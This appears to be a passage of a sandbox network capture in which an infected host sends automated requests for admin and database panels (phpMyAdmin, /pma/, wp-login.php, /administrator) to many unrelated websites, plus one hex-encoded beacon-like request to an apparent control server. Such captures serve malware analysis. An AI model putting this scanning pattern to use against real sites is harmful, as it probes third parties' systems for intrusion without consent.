Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.analvids.com/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port
418         192.168.2.6  63017        45.60.74.50      80

Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.262080908 CET  185                OUT        GET /wp-login.php HTTP/1.1
Host: zuhauseplus.vodafone.de
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID  Source IP    Source Port  Destination IP   Destination Port
419         192.168.2.6  63168        104.22.43.158    80

Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.265103102 CET  174                OUT        GET /pma/ HTTP/1.1
Host: casinocontroller.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.597428083 CET  445                IN         HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abd49be49adcf-ATL
Content-Encoding: gzip
Feb 5, 2024 12:16:07.597462893 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
420         192.168.2.6  63056        13.248.169.48   80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.275441885 CET  172                OUT        GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.604123116 CET  1190               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JExPAaM+MSwpEncYEukSvrqhD0vGMBVI4Ybpsn40Ikc5finK/ZyaG0SMH6Wm+bTD4if8FqBmxLLMFd8tFhUbkA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
421         192.168.2.6  63067        31.216.144.5    80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.279109001 CET  168                OUT        GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.480349064 CET  195                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


Session ID  Source IP    Source Port  Destination IP  Destination Port
422         192.168.2.6  63045        185.196.8.22    80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.290751934 CET  326                OUT        GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:16:07.531451941 CET  220                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID  Source IP    Source Port  Destination IP  Destination Port
423         192.168.2.6  62946        202.81.112.32   80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.304267883 CET  195                OUT        GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.627079010 CET  369                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://testconnect.garena.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
424 | 192.168.2.6 | 63061 | 82.221.28.171 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.309834003 CET | 166 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.544230938 CET | 529 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=60
                                                                                                                                                                                                                                                                                                                                                                Location: https://uh.is/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
425 | 192.168.2.6 | 63062 | 163.247.44.239 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.319330931 CET | 186 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.562757015 CET | 123 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
Feb 5, 2024 12:16:11.017945051 CET | 185 | OUT | GET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.262245893 CET | 122 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/phpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
426 | 192.168.2.6 | 63173 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.351217985 CET | 173 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.678003073 CET | 1190 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HgGLa2ZqsCpCEK8zzb/jbfkVJQcEj7nNxsDThlwrEpzbE9yR2GhYIKzKBPjdoTl7Qia4M0KP1O5IVRwpqQqwcQ
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
427 | 192.168.2.6 | 62965 | 185.78.166.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.351281881 CET | 203 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.704467058 CET396INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpmyadmin/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
428 | 192.168.2.6 | 63174 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.361924887 CET | 178 | OUT | GET /pma/ HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.654576063 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=13974631a4e2457fd96fc7589cd3b576; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 332b<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
Feb 5, 2024 12:16:07.654617071 CET | 1286 | IN | Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
Feb 5, 2024 12:16:07.654654980 CET | 1286 | IN | Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
Feb 5, 2024 12:16:07.654711008 CET | 1286 | IN | Data Ascii: vationdevelopment.eu/pl/pma/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/pma/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/pma/" /><link href="images/favicon.png"
Feb 5, 2024 12:16:07.654766083 CET | 1286 | IN | Data Ascii: default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="button" title="extra larg
Feb 5, 2024 12:16:07.654804945 CET | 1286 | IN | Data Ascii: nnome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a></div><div class="ba
Feb 5, 2024 12:16:07.654856920 CET | 1286 | IN | Data Ascii: ;</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allowed',1,60);$(this).parent().fadeOut(1
Feb 5, 2024 12:16:07.654895067 CET | 1286 | IN | Data Ascii: the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two different types of people, the word
Feb 5, 2024 12:16:07.654931068 CET | 1286 | IN | Data Ascii: er, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses cookies to <br> only for the correct
Feb 5, 2024 12:16:07.654967070 CET | 1286 | IN | Data Ascii: v class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35px; width:91px" /> <img alt="" src="/
Feb 5, 2024 12:16:07.665245056 CET | 775 | IN | Data Ascii: v><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="email" placeholder="Leave your e-mail


Session ID | Source IP | Source Port | Destination IP | Destination Port
429 | 192.168.2.6 | 62958 | 36.255.71.45 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.365714073 CET | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.735564947 CET | 150 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:16:11 GMT
content-length: 0
location: https://instructory.net/phpmyadmin/
cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
430 | 192.168.2.6 | 63290 | 31.13.88.1 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.378252983 CET | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: th-th.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.480612993 CET | 213 | IN | HTTP/1.1 301 Moved Permanently
Location: https://th-th.facebook.com/phpmyadmin/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:07 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
431 | 192.168.2.6 | 62999 | 185.78.166.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.387835979 CET | 215 | OUT | GET /administrator/index.php HTTP/1.1
Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.732858896 CET | 408 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
432 | 192.168.2.6 | 63172 | 181.4.228.155 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.411340952 CET | 183 | OUT | GET /admin/ HTTP/1.1
Host: ventas.officeinsumos.com.ar
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.675556898 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:16:07.675595999 CET | 151 | IN |
Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
433 | 192.168.2.6 | 63176 | 181.4.228.155 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.416757107 CET | 181 | OUT | GET /pma/ HTTP/1.1
Host: ventas.officeinsumos.com.ar
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.688494921 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:16:07.688529015 CET | 151 | IN | Data Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
434 | 192.168.2.6 | 63363 | 45.60.0.44 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.431020975 CET | 176 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.662090063 CET | 958 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; expires=Tue, 04 Feb 2025 10:21:14 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzv; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 44-17307560-17307561 NNNY CT(118 -1 0) RT(1707131767223 1) q(0 0 0 0) r(1 1) U24
